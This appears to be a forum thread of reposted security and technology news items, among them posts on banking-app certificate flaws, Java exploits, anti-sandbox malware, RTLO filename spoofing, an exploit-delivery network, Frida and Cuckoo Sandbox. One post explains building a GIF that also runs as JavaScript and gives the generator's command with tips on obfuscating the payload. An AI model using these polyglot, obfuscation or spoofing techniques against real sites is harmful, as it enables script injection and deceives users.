that it was hopeless. And they totally succeeded. But now it's happening again, and we're hoping to be the answer to that," he says. "But you have to find a balance. The things that we won't be releasing are the things that give us a competitive edge. We won't release the source code for our installer. That would be crazy." "But we don't have any plans to close source any of the existing stuff," he says, definitively. "We're building on top of the open source project. We're not even maintaining a closed fork of CM internally. Anything that we need to do to support our own applications, we'll build the APIs [application programming interface] into the open source side and ship that. Cid is CyanogenMod's slightly angry mascot "Going forward, you're going to see two release branches. One is going to be business as usual, what we're releasing today. Then you're going to see a version that comes with extra stuff that we've done that we think is pretty awesome." "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. Some community members have also worried about the pressure on a business to make money, and how that will affect CM at large. "Right now, we're following the great Silicon Valley idea of 'get the users, and the money will come later'," says Kondik. "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. We're trying to build something important. There's too much time, and too many emotions from too many people involved to give it anything less than what it deserves." Gaining ground It's important for a project like CyanogenMod to remember the emotions and history that went into getting it to where it is today. When Kondik and Koush look back on the early days, they talk about the speed of growth and voracity of its contributors as though they're not quite sure it really happened. The first official phone with Cyanogen Mod was the Oppo N1"A few people had looked at different approaches to building on Android, but when I posted my version up, people seemed to really go crazy over it," says Kondik. "It was really awesome because of how quick people were to try it out and give feedback on what's broken and what could be better. So I kept at it for a few months and more people started using it, more people started submitting patches and wanted to work on it. Koush got involved when the first Motorola Droid hit the shelves, porting CM to it." "For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." "I recall the first year there was maybe only a dozen guys, and then I disappeared for a year, and I came back and there were a hundred guys," says Koush. "And then a year later there were 500, and now there's 2,000. It's just crazy. It's exponential growth for contributors and for users." But despite all the changes that come from changing from a purely contributor and community-driven project to a well funded business, the team promises that the feel of CyanogenMod won't change. Mascot Cid replaced the popular Andy Bugdroid "A lot of the guys who were on the open source project were going to their day jobs and then hacking on CM for a long time, including myself," says Kondik. "And now we just work on CM the whole time. But one thing that has not changed is working very, very late. Until 5 o'clock in the morning," he laughs. But is it the classic Silicon Valley startup with fun toys around the office? "We have a kegerator!" shouts Kondik, proudly. "And a really nice coffee machine," adds Koush. "I think we're all on the same page; the office is somewhere you want to come into and work, so we don't do cubes. We have a really nice setup and design." There is one thing that will change for CyanogenMod when it launches for a mainstream audience, though: the name. The team says that the company will still be called Cyanogen, and the open source project will keep its name, but for reaching a wider audience, the operating system will be called something new. "Yeah, it's changing…" Koush chuckles. "At some point. For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." Sursa: CyanogenMod: from bedroom Android hack to million dollar mobile OS | News | TechRadar
-
[h=2]Hacking through image: GIF turn[/h] In one of my previous posts I described a way to hack through images. That time I showed how a valid BMP file could be a valid JS file as well, hiding Javascript operations. Today it's time to describe how this attack work with a more common web file format: .GIF. Ange commented on my previous post showing me out his great work on the topic. I recomend to have a look to his study (here). Following my quick 'n dirty python implementation on the technique. The following HTML page wants to parse a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. Theoretically the file should be or a valid GIF file or a valid JavaScript file. Could it be a valid javacript and a valid image file at the same time ? The answer should be NO. But properly forging the file the answer is YES, it is. Let's assume to have the following HTML page. Browsing this file you'll find out this result: As you can see, both tags (img and script) are succesfully executed. The Image tag is showing the black GIF file and the script tag is doing its gret job by executing a JavaScript (alert('test')). How is it possible ? The following image show one detail about the dirty code who generates the beautiful GIF file. This is not magic at all. This is just my implementation of the GIF parsing bug many libraries have. The idea behind this python code is to create a valid GIF header within \x2F\x2A (aka \*) and then close up the end of the image through a \x2A\x2F (aka *\). Before injecting the payload you might inject a simple expression like "=1;" or the most commonly used "=a;" in order to use all the GIF block as a variable. The following image shows the first part of a forget GIF header to exploit this weakness (click to enlarge). After having injected the "padding" chars (in this case I call padding the " '=a;' characters", which are useful to JS interpreter) it's time to inject the real payload. The small script I've realized automizes this process and you might want to run it in a really easy way: Run-it as: gif.py -i image.gif "alert(\"test\");" Don't forget, you might want to use obfuscators to better hide your javascript like the following example: python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);" If you wat to check and/or download the code click here. Enjoy your new hackish tool ! Posted by Marco Ramilli Sursa: Marco Ramilli's Blog: Hacking through image: GIF turn
-
Just how secure is that mobile banking app? by Paul Ducklin on January 10, 2014 Ariel Sanchez, a researcher at security assesment company IOActive, recently published a fascinating report on the sort of security you can expect if you do your internet banking on an iPhone or iPad. The answer, sadly, seems to be, "Very little." You should head over to IOActive's blog to read the whole report. Sanchez details the results of a series of offline security tests conducted against 40 different iOS banking apps used by 60 different banks in about 20 different countries. Two problems stood out particularly: 70% of the apps offered no support at all for two-factor authentication. 40% of the apps accepted any SSL certificate for secure HTTP traffic. Two-factor authentication Banks are not alone in embracing and promoting two-factor authentication (2FA), also known as two-step verification. Sites like Facebook, Twitter, and Outlook.com all offer, and encourage, the practice, for example by sending you an SMS (text message) containing a one-time passcode every time you try to log in. The extra security this provides is obvious: crooks who steal your regular username and password are out of luck unless they also steal your mobile phone, without which they won't receive the additional codes they need to login each time. You'd think that once a company had gone to the trouble of implementing 2FA for its customers, it would make it available to all its users. But many of the banks, just like the social networks and webmail services, have let their mobile apps lag behind. No support for 2FA, however, pales into insignificance when compared to the second problem: no HTTPS certificate validation. The chain of trust HTTPS certificates rely on a chain of trust, and validating that chain is important. Here's an example of an HTTPS connection, browsing to the "MySophos" download portal using Firefox: If we click on the [More information...] button, we'll see that the chain of trust runs as shown below. GlobalSign vouches for the GlobalSign Extended Validation CA (Certificate Authority), which vouches for Sophos's claim to own Antivirus, Endpoint, Disk Encryption, Mobile, UTM, Email and Web Security | Sophos And GlobalSign is trusted directly by Firefox itself, with that trust propagating downwards to Sophos's HTTPS certificate: This chain of trust stops anyone who feels like it from blindly tricking users with a certificate that says, "Hey, folks, this is sophos.com, trust us!" Anyone can create a certificate that makes such an claim, but unless they can also persuade a trusted CA to sign their home-made certificate, you'll see a warning that something fishy is going on when the imposter tries to mislead you: Digging further will explain the problem, namely that you have no reason to trust the certificate's claim that this really is a sophos.com server: You'll see a similar warning if you visit the imposter site from your iPhone or iPad, too: Again, digging further will reveal the untrusted certificate, and expose the deception, making it clear that you aren't actually dealing with sophos.com at all: Now remember that in IOActive's report, 40% of iOS banking apps simply didn't produce any warnings of that sort when faced with a fake certificate. You can feed those apps any certificate that claims to validate any website, and the app will blindly accept it. So, if the banking app is misdirected to a phishing site, for example while you are using an untrusted network such as a Wi-Fi hotspot, you simply won't know! In fact, it's not that you won't notice, but that you can't notice, and this is completely unacceptable. The silver lining, I suppose, is that 60% of the 40 apps that IOActive tested did notice bogus HTTPS certificates. The problem, though, is how you tell which camp your own bank's app falls into. If you aren't sure, it's probably best just to stick to a full-size computer, and a properly patched browser, for your internet banking. Ironically, we wrote recently about a move by Dutch banks to set some minimum security standards that they will require customers to follow if they are to qualify for refunds of money stolen through phishing, carding or other forms of online fraud. Sounds as though there may be a spot of "Physician, heal thyself" needed here... Sursa: Just how secure is that mobile banking app? | Naked Security
-
Teen Reported to Police After Finding Security Hole in Website By Kim Zetter 01.08.14 7:44 PM Joshua Rogers. Photo: Simon Schluter. A teenager in Australia who thought he was doing a good deed by reporting a security vulnerability in a government website was reported to the police. Joshua Rogers, a 16-year-old in the state of Victoria, found a basic security hole that allowed him to access a database containing sensitive information for about 600,000 public transport users who made purchases through the Metlink web site run by the Transport Department. It was the primary site for information about train, tram and bus timetables. The database contained the full names, addresses, home and mobile phone numbers, email addresses, dates of birth, and a nine-digit extract of credit card numbers used at the site, according to The Age newspaper in Melbourne. Rogers says he contacted the site after Christmas to report the vulnerability but never got a response. After waiting two weeks, he contacted the newspaper to report the problem. When The Age called the Transportation Department for comment, it reported Rogers to the police. “It’s truly disappointing that a government agency has developed a website which has these sorts of flaws,” Phil Kernick, of cyber security consultancy CQR, told the paper. “So if this kid found it, he was probably not the first one. Someone else was probably able to find it too, which means that this information may already be out there.” The paper doesn’t say how Rogers accessed the database, but says he used a common vulnerability that exists in many web sites. It’s likely he used a SQL injection vulnerability, one of the most common ways to breach web sites and gain access to backend databases. The practice of punishing security researchers instead of thanking them for uncovering vulnerabilities is a tradition that has persisted for decades, despite extensive education about the important role such researchers play in securing systems. The Age doesn’t say whether the police took any action against Rogers. But in 2011, Patrick Webster suffered a similar consequence after reporting a website vulnerability to First State Super, an Australian investment firm that managed his pension fund. The flaw allowed any account holder to access the online statements of other customers, thus exposing some 770,000 pension accounts — including those of police officers and politicians. Webster didn’t stop at simply uncovering the vulnerability, however. He wrote a script to download about 500 account statements to prove to First State that its account holders were at risk. First State responded by reporting him to police and demanding access to his computer to make sure he’d deleted all of the statements he had downloaded. In the U.S., hacker Andrew Auernheimer, aka “weev”, is serving a three-and-a-half-year sentence for identity theft and hacking after he and a friend discovered a hole in AT&T’s website that allowed anyone to obtain the email addresses and ICC-IDs of iPad users. The ICC-ID is a unique identifier that’s used to authenticate the SIM card in a customer’s iPad to AT&T’s network. Auernheimer and his friend discovered that the site would leak email addresses to anyone who provided it with a ICC-ID. So the two wrote a script to mimic the behavior of numerous iPads contacting the web site in order to harvest the email addresses of about 120,000 iPad users. They were charged with hacking and identity theft after reporting the information to a journalist at Gawker. Auernheimer is currently appealing his conviction. Update 1.9.14: Rogers confirmed to WIRED that the vulnerability he found was a SQL-injection vulnerability. He says the police have not contacted him and that he only learned he’d been reported to the police from the journalist who wrote the story for The Age. Sursa: Teen Reported to Police After Finding Security Hole in Website | Threat Level | Wired.com
-
[h=1]Java vulnerabilities keep breeding[/h]Dec 10, 2013 Denis Makrushin As many as 4.2 million attacks using Java exploits were repelled by our Automatic Exploit Prevention system between September 2012 and August 2013. This number indicates two points. The first point, of course, is the efficiency of our technology. The second point, unfortunately, is the fact that the quantity of attacks on Java has not been reduced, but vice versa – it has increased. Various Kaspersky Lab products have blocked about 14.1 million attacks exploiting Java vulnerabilities, which is one-third more than from 2011-2012. Unfortunately, Java has been and remains a headache for all those involved in information security. There are several reasons for that. Firstly, despite all of its flaws, Java is extremely popular with developers (according to some reports, there are about 9 million people worldwide who use it) sine this language allows them to create cross-platform applications, as they all run in the Java Virtual Machine. For this reason, Java has spread enormously on all user platforms. Now, it is being employed by more than three billion devices worldwide. There is also another reason for its popularity: the development of Java started a long time ago, when there was no point warning users about the prevalence of malware or especially exploits; there was no reason to waste time on its security. It’s no wonder then that last year 50% of attacks using exploits were targeted at Java. See the general dynamics of the number of attacks using exploits on the chart below: Since a slight decline in mid 2012, it has been growing. While the other two “favorite” formats for intruders – PDF and Flash – have been, on the contrary, losing “popularity”. One reason for the growing number of attacks is the fact that between September 2012 and August 2013 there were 160 new vulnerabilities discovered, i.e. twice as much as during the previous 12 months. A recent Kaspersky Lab’s study on the evolution of Java exploits shows particular growth (+21%) of the number of attacks from March until August 2013. 80% of the attacks occurred in 10 countries. This list is topped off by the U.S., Russia, Germany and Italy. More than a half of the attacks used exploits related to six well-known groups. In other words, we cannot say that attackers sought to diversify their tools. What do all these frightening numbers mean for business? First of all, you must understand that attackers deliberately search for Java vulnerabilities, so that the use of applications written in this language is unsafe by itself. It does not mean that all of them should be removed immediately, but you must control them. Secondly, the statistics show that Java is not just the most frequently attacked software, but also one of the most reluctantly updated. On average, even a month and a half after the release of another corrected version, most users do not rush to upgrade Java on their devices. And if system administrators can update Java centrally within a corporate infrastructure, user devices may be somewhat tricky. Unfortunately, exploits are a threat even in cases when users are well-versed in IT, aware of the dangers of malware and prompt to update software as soon as new versions are released. The point is that zero day exploits for new vulnerabilities appear before a developer (in this case, Oracle) learns of the existence of these flaws. Hackers and developers are in a race, but the developers constantly “catch up”. And users are at risk all the time between the detection moment and the update release. Eventually, exposing oneself to an attack is quite easy just by visiting any legitimate site with a malicious code embedded by hackers. The surest way to protect against exploits is to use automated tools that block their activity in a preventive mode. Our Automatic Exploit Prevention technology is such a tool. Despite the diversity of existing exploits they all have several similarities. Besides the fact that they are always written for specific software, exploits also have typical behavior patterns, and operate attakcs similarly. This is why for the most vulnerable software products and platforms (including Java) AEP enables the “presumption of guilt” mode, so if it tries to download and run an executable file, it becomes a reason for additional checks, including tracking the source of the launch command and verifying the origin of the file being downloaded. If the file’s characteristics are suspicious, then it’s running is automatically blocked. Here is a good example. In early January an exploit of Java’s zero day vulnerability CVE 2013-0422 was detected. The exploit proved to be extremely efficient with 83% successful attacks. It even got to the point where cyber security experts from US National Security Agency recommended that users should disable the Java plugin in web browsers to protect themselves against malicious attacks that used this previously unknown vulnerability. At the same time, the statistics of Kaspersky Security Network showed that the users of Kaspersky Lab’s products with AEP technology successfully blocked the exploit on the grounds of behavioral analysis even before the incident was made public. Sursa: Java vulnerabilities keep breeding | Blog on Kaspersky Lab business
-
How public tools are used by malware developers, the antivm tale Alberto Ortega October 4, 2013 Malware authors are aware of new technologies and research made by the security community. This is palpable when they implement new vulnerability exploitation on their tools or even reuse source code that belongs to public projects. We have discussed antivm and antisandbox analysis tricks seen in malware samples several times. Not long ago we came across a malware sample that had an interesting way to detect if it was being executed in a virtual environment / sandbox. You have probably heard about pafish or ScoopyNG, tools that pretend to be a proof of concept regarding this topic. Sadly, it is a matter of time that malware developers use that code to implement these techniques in new developments. Our malware sample had a weird behavior when it was executed in a sandbox or virtual environment. Somehow, it was detecting that the environment was hostile for itself, let's see how. It has four different executables embedded on it. One is a copy of pafish, another one a copy of ScoopyNG, and two malicious payloads. At running time it drops and executes the two first ones and it tries to detect if it is running under a virtual machine or sandbox. If none of them detect anything, it drops the malicious payload and continues the execution. We can see it in the malwr.com analysis. As you can see, the sandbox has been detected by pafish and the malware has started to create junk files in an infinite loop. Once we have located the routine, patch that jnz loc_4019B0 to disable the detection is an easy task. After patched, the behavior in malwr.com is completely different. It has dropped more files and tried to resolve four different domains, after that, the box is rebooted. To be sure about what happened next, we can try to run it in our own malware analysis machine. After the box is rebooted, this is what we find. So we have a fake AV in the house! The malicious payloads are a dropper that installs a Braviax variant. In this case, those public tools have helped us to disable the detections. It is very positive to release them to the public to train researchers on these topics. Sadly, sometimes you can find this double-edged sword being used in the wild. Sursa: http://www.alienvault.com/open-threat-exchange/blog/how-public-tools-are-used-by-malware-developers-the-antivm-tale
-
[h=1]BGPmon[/h] BGPmon BGP Hikack Monitoring optional arguments: -h, --help show this help message and exit -b, --baseline Baseline records -c, --check Check for any discrepancies in database -e EMAIL, --email EMAIL Add Email to database -ip IP, --ip IP Add IP to database Saif El-Sherei I. Introduction: BGPmon monitors your bgp route for hijacking and sends email alerts whenever discrepencies is found between the baseline and the latest update records, it utilizes "Team Cymru" IP to ASN tool using bulk queries. BGP hijack monitor grabs the originating AS for a list of IPs saved in the database. and if the "-b" switch is supplied will insert the result in the baseline table. if no switched are supplied the results will be saved in the latest Update tables. The tool utilitzed 'Team Cymru' IP to ASN tool. i would like to extend my special appreciation and thanks to this group for providing such a service. II. Installation: create database 'bgpmon' with user 'bgpmon' and password make sure to update both the bgp-db.py and bgpmon.py with the db name, dbhost, db user, db password. update db details in 'bgpmon.py' line 26 update db details in 'bgp-db.py' line 5 run the bgp-db.py script to create the required tables. add IP with '-ip' switch to be monitored add email with '-e' swtich to be alerted II. Usage: since this tool is made to be running in the cli please note that all std_out is saved in the log file '/var/log/bgp_mon.log' if you want to cancel this behaviour just comment out line 21 in 'bgpmon.py' script. you will see the output on your terminal ./bgpmon.py -e Add Email to the emails table to be alerted. ./bgpmon.py -ip [iP] Add IP to the ips table to be monitored. ./bgpmon.py -b grabs the origin AS for the IPs in the Database and save the results in the base_line tables ./bgpmon.py grabs the origin AS for the IPs in the Database and save the results in the latest_update table. and checks for differences between latest_update and base_line. ./bgpmon.py -c Manual check the records with MAX time stamp in 'latest_update' table with records in the 'base_line' table for the each ip for differences if any difference is found send email to the saved emails. Sursa: https://github.com/ssherei/BGPmon
-
[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h] Posted by Michael Larabel in Linux Kernel on 19 October 2013 03:42 PM EDT NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years by the upstream author of Netfilter. This new nftables system is set to be merged now into the Linux 3.13 kernel. NFTables has been in development for years and to replace IPTables by offering a simpler kernel ABI, reduce code duplication, improved error reporting, and provide more efficient support of filtering rules. Beyond IPTables, it also replaces the ip6tables, arptables, and ebtables frameworks but nftables does offer a compatibility layer to iptables support. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page. Earlier this week a pull request was sent in for pulling in nf_tables for the next Linux kernel release through the net-next branch. The pull request was accepted and is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide. Sursa: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13
-
How's My SSL How's My SSL? is a cute little website that tells you how secure your TLS client is. TLS clients just like the browser you're reading this with. How's My SSL? was originally made to help a web server developer learn what real world TLS clients were capable of. It's been expanded to give developers and the very technically-savvy a quick and easy way to learn more about the TLS tools they use. It's also meant to impell developers to modernize and improve their TLS stacks. Many security problems come from engineers simply not knowing what worries to have. How's My SSL? is a demonstration of what those TLS client worries should be. How's My SSL? chooses topics important to today's security environment and analyzes clients in that context. It will never be a complete audit, but it can hit the high notes. Over time, How's My SSL? will change to live in an ever more difficult security environment. It will be kept up by people who care. Link: https://www.howsmyssl.com/
-
Inject JavaScript to explore native apps Inject JavaScript to explore native apps on Windows, Mac, Linux and iOS. [h=2]Scriptable[/h] Your own scripts get injected into black box processes to execute custom debugging logic. Hook any function, spy on crypto APIs or trace private application code, no source code needed! [h=2]Stalking[/h] Stealthy code tracing without relying on software or hardware breakpoints. Think DTrace in user-space, based on dynamic recompilation, like DynamoRIO and PIN. [h=2]Portable[/h] Works on Windows, Mac, Linux, and iOS. Grab a Python package from PyPI or use Frida through its .NET binding, browser plugin or C API. [h=4]Get up and running in seconds.[/h] ~ $ sudo easy_install frida ~ $ frida-trace -i 'recv*' Skype recvfrom: Auto-generated handler: …/recvfrom.js Started tracing 21 functions. 1442 ms recvfrom() # Live-edit recvfrom.js and watch the magic! 5374 ms recvfrom(socket=67, buffer=0x252a618, length=65536, flags=0, address=0xb0420bd8, address_len=16) Sursa: Frida
-
The RTLO method January 9, 2014 | By Pieter Arntz After my post about extensions, I received some requests to deal with another method of pretending to be a different type of file. If you have not read that article yet, it will prove helpful to do that first in order to better understand this post. What is RTLO (aka RLO)? The method called RTLO, or RLO, uses the method built into Windows to deal with languages that are written from right to left, the “Right to left override”. Let’s say you want to use a right-to-left written language, like Hebrew or Arabic, on a site combined with a left-to-right written language like English or French. In this case, you would want bidirectional script support. Bidirectional script support is the capability of a computer system to correctly display bi-directional text. In HTML we can use Unicode right-to-left marks and left-to-right marks to override the HTML bidirectional algorithm when it produces undesirable results: left-to-right mark: ? or ? (U+200E) right-to-left mark: ? or ? (U+200F) How is RTLO being abused by malware writers? On systems that support Unicode filenames, RTLO can be used to spoof fake extensions. To do this we need a hidden Unicode character in the file name, that will reverse the order of the characters that follow it. Look for example at this file, a copy of HijackThis.exe, that I renamed using RTLO: The last seven characters in the file name are displayed backwards because I inserted the RTLO character before those seven characters. As discussed in the previous article, assigning a matching icon to a file is a triviality for a programmer. So here we have an executable file that seems to have the PDF extension. Ironically, you will see straight through this deception if you are still running XP, since it does not support these file names: The square symbol shows us where the Unicode RTLO character is placed. One way to catch these fakes on more modern versions of Windows is to set the “Change your view” ruler to “Content”. Set this way, you can see that the files are applications and not a PDF or jpg. This may be a good idea for your “Download” folder(s), so you can check if you have downloaded what you expected to get. Is the RTLO method actively being used? The technique has been know for quite a while and is starting to re-surface. It is not only being used for filenames by the way. A malware known as Sirefef (which Malwarebytes Anti-Malware detects as Trojan.Agent.EC ) uses the RTLO method to trick users into thinking that the entries it puts into the infected machine’s registry are legitimate ones, belonging to Google update. Does this have any effect on the detection of these files? No. Detection of malicious file is never done by a filename alone. So your AV and Malwarebytes Anti-Malware will still recognize these files if they were added to their detection, no matter what they are called or how they are written. Summary: RTLO is used to fake extensions by writing part of the filename or other descriptions back to front. Although the detection by your AV or Malwarebytes Anti-Malware is not altered in any way this trick can be deceiving users at first glance. Sources : http://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html Sirefef Malware Found Using Unicode Right-to-Left Override Technique | Threatpost - English - Global - threatpost.com H34: Using a Unicode right-to-left mark (RLM) or left-to-right mark (LRM) to mix text direction inline | Techniques for WCAG 2.0 Sursa: The RTLO method | Malwarebytes Unpacked
-
Exploit Delivery Networks Posted on January 9, 2014 by darryl Exploit packs are normally set up on a hacker-controlled server. Compromised websites or malicious email links lead unsuspecting users to the drive-by landing page on the server. While this keeps the main control panel, renter’s panel, crypter, statistics, etc all in one place, it’s vulnerable to a take-down resulting in a major disruption and a loss of statistical data among other things. We might be seeing the beginning of a new trend where distributed, self-contained exploit packs are installed on multiple compromised websites. A back-end server pushes out updates to and retrieves statistics from these websites. Take-downs of these compromised websites hosting the exploit packs don’t cause a major disruption anymore. The hackers just compromise other websites and quickly build it back up. This is basically a content delivery network but for exploits — an “Exploit Delivery Network”, if you will. RedKit is a prime example (you can read about it here). Another exploit pack was recently revealed which operates in a similar manner. Special thanks to a colleague of mine who provided me with intel and permission to write about this. Also thanks to a forum administrator who provided me with the files after his site was compromised. Ramayana Exploit Pack The “DotkaChef” exploit pack was discovered several months ago. Its real name is ramayana. Recently, the cybercriminals behind ramayana targeted numerous forums running vulnerable versions of IP.Board (read more here). After successfully exploiting the website, a folder is created with the self-contained exploit pack copied to it. The PHP script verifies that the incoming URL contains the correct parameters and values otherwise you won’t get infected. This prevents researchers from trying to analyze the pack. Here’s an example exploit chain related to ramayana: website/panel/js/fe0e2feefe/?=MDct5ibpFWbf12c8lzM1ATN4YDM1UDMwk zM89SZmVWZmJTZwUmZvMnavwWZuFGcvUGdpNnYld3LvoDc0RHa8NnZ website/panel/js/fe0e2feefe/?f=a&k=3900550685053931 website/panel/js/fe0e2feefe/?f=s&k=3900550685053919 website/panel/js/fe0e2feefe/?f=sm_main.mp3&k=3900550685053942 Here’s the part of the script that sends the exploit over. There are two Java exploits used — atom.jar (CVE-2013-2423) and byte.jar (CVE-2013-1493). The Java applets and their related payloads are the four other files you see in the folder screenshot above. Those files are base64-encoded and are decoded upon delivery. A stats file is also created which contains the key parameter from the URL and a status code. The PHP script defines the values of the status code: The backend system that controls the exploit pack nodes runs Python. It does a health check, builds the exploit pack files, pushes out updates, and other things. And of course there is a dashboard with a statistics panel which is fed by a stat-harvesting script. This appears to be an important measure of an exploit pack’s success and therefore part of most control panels. Summary “RedKit” and ramayana may represent a new class of exploit packs and an evolutionary improvement over their peers. Their exploitation methods remains the same but the delivery system uniquely leverages compromised websites to host disposable components of their exploit pack in order to maximize resiliency, protect their backend systems, and ultimately, to ensure the longevity of their criminal operations. Time will tell if Exploit Delivery Networks become the new norm but it’s something to keep a close eye on nonetheless. Sursa: Exploit Delivery Networks | Kahu Security
-
China ALSO building encryption-cracking quantum computer You didn't think we'd let the West have all the fun, did you? By Phil Muncaster, 10th January 2014 It’s not just the NSA that’s said to be working on a quantum computer – China is also pulling out all the stops to beat its arch rival with a crypto-cracking machine of its own. The National Natural Science Foundation of China funded 90 quantum-based projects in 2013, with the order from Beijing to get the job done irrespective of the cost, according to South China Morning Post. "The value of the quantum computer to the military and government is so great, its cost has never been considered," Zheziang university professor Wang Haohua told the paper. "Many Chinese scientists abroad, such as myself, have been attracted by the rapid technological development in China and are returning home. We hope to help China catch up with the West. It is not impossible that we may even win the race in the future." As part of the huge effort by academics and military boffins, China has apparently built a three-storey Steady High Magnetic Field Experimental Facility on Hefei Science Island, Anhui province. Once operational, the facility could generate a magnetic field in excess of 45 Tesla, creating a more stable environment for quantum research by increasing the distance between qubits, according to the report. "Under super-strong magnetic fields, the distance between qubits can be increased, making our jobs easier,” project leader Chen Hongwei told the paper. "If qubits can be tamed this way, the first quantum computer may be born inside a magnet.” The latest batch of Edward Snowden docs revealed last week that the NSA has budgeted $79.7m for the development of a quantum computer capable of cracking most kinds of encryption systems. However its “Owning the Net” initiative apparently faces competition from rival projects in the EU and Switzerland, as well as China. Even with the brightest minds on the planet and the unlimited resources of China working on the problem, it could still be decades before a working quantum computer is built, according to some experts. ® Sursa: China ALSO building encryption-cracking quantum computer • The Register
-
Cuckoo Sandbox 1.0 It took a while. After almost four years of development, ups and downs, more people joining the project and more people using it, we finally reached version 1.0. We've been procrastinating a lot while trying to get this release done, mainly for the concern of having a mature enough software worthy of the release code, but it's finally completed and ready for download! There is a number of improvements, bugfixes and new features available in this release. Most importantly Cuckoo is now provided with a full-fledged Django and MongoDB-powered web interface. Similarly to Malwr, you can use it to submit files and URLs, browse through the analyses as well as search across the full dataset. Other noteworthy additions are support for VMWare ESXi, new modules, more analysis packages and an overall improvement in stability and reliability of the software. Changelog Following is the CHANGELOG for this version: - Introduced Auxiliary modules - Added option to set sniffing interface for each virtual machine - Added option to set snapshot for each virtual machine - Added pagination to API - Added option to REST API to return compressed archives of files ("all" and "dropped") - Added option to set Result Server IP and port for each virtual machine - Added processing module for volatility to analyze memory dumps, disabled by default - Added new "reported" status for analysis tasks - Added automated rescheduling of locked tasks at startup - Added tags to machines - Added reduced behavioral events - Added new Django/Mongo-powered web interface - Added Windows analyzer auxiliary module to disguise the analysis environment - Added VBS, CPL and RTF analysis package - Added generic analysis package to execute samples via cmd.exe - Added MAEC 4.0.1 reporting module - Added filter for private networks in Network Analysis processing module - Added max_analysis_count to cuckoo.conf to automatically shutdown Cuckoo - Added check for available disk space - Added support for BSON logging format - Added option to specify a custom DLL to the analyzer and the analysis packages - Added ICMP protocol dissection - Added ESX Virtual Machine Manager - Slightly improved CuckooMon's stealthiness and stability - Refactored processing to improve performances - Refactored signature engine, introducing event-based signatures to improve performances - Refactored generation of process tree - Transitioned network sniffer to auxiliary module - Renamed MachineManagers to Machinery modules - Renamed Metadata to MMDef reporting module - Fixed virtual machine clock, now is updated to current time or specified by user via --clock option - Fixed bug in Human auxiliary module, now moving cursor to absolute positions - Fixed issue in Human auxiliary module, using SetCursorPos instead of mouse_event - Fixed issues with resolving relative filenames in CuckooMon - Removed support for GrayLog2 - Removed pickle reporting module - Removed MAEC 1.1 reporting module Known Issues At the moment we are only aware of one existing issue when analyzing .NET applications. In most cases you'll have inconsistent results and possibly crashes or sudden termination of the analyzed binary. We are currently investigating the issue and we'll hopefully have a fix in the near future. Conclusions This release represents an important landmark for the maturity of the project. We've made it this far thanks to the support of the community and the outstanding work of our developers and our contributors, committed into providing a valuable open source software to the public and dedicating every bit of time to it. Enjoy. published on 2014-01-09 17:30:00 by nex Sursa: Automated Malware Analysis - Cuckoo Sandbox
-
[h=1]VIDEO: Understanding Bitcoin and Securing your Digital Wallet[/h] Digital currencies such as Bitcoin grew in popularity in 2013 and set to be one of this year’s big talking points. One essential ingredient of a digital currency is somewhere to store your money – a digital wallet. Just like a real wallet, it’s wise to take steps to secure your digital counterpart to keep your money safe. In this video, AVG’s Michael McKinnon gives a short guide to securing your digital wallet and keeping your digital currency safe. [h=3]Watch the guide[/h] Sursa: VIDEO: How to secure your digital wallet